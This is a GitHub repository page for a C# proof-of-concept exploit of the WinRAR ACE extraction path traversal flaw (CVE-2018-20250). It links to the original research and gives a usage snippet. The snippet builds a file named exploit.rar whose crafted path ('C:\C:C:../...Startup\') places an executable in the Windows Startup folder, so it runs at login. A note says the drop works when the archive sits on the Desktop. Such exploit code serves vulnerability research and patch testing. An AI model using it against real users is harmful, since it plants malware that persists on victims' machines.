Skip to content

Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

Notifications You must be signed in to change notification settings

easis/CVE-2018-20250-WinRAR-ACE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2018-20250-WinRAR-ACE

Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

Resources

https://research.checkpoint.com/extracting-code-execution-from-winrar/ https://github.com/droe/acefile https://apidoc.roe.ch/acefile/latest/

Dependencies

InvertedTomato.Crc (you can install it with NuGet) for the checksum method. You can use any other JAMCRC implementation.

How to use

  AceVolume av = new AceVolume();
  AceFile f = new AceFile(
    @"D:\some_file.exe",
    @"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
  );
  av.AddFile(f);
  av.Save("exploit.rar");

Bugs

Seems that it only extracts to startup folder when the .rar file is in Desktop or any folder on the same level.

About

Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages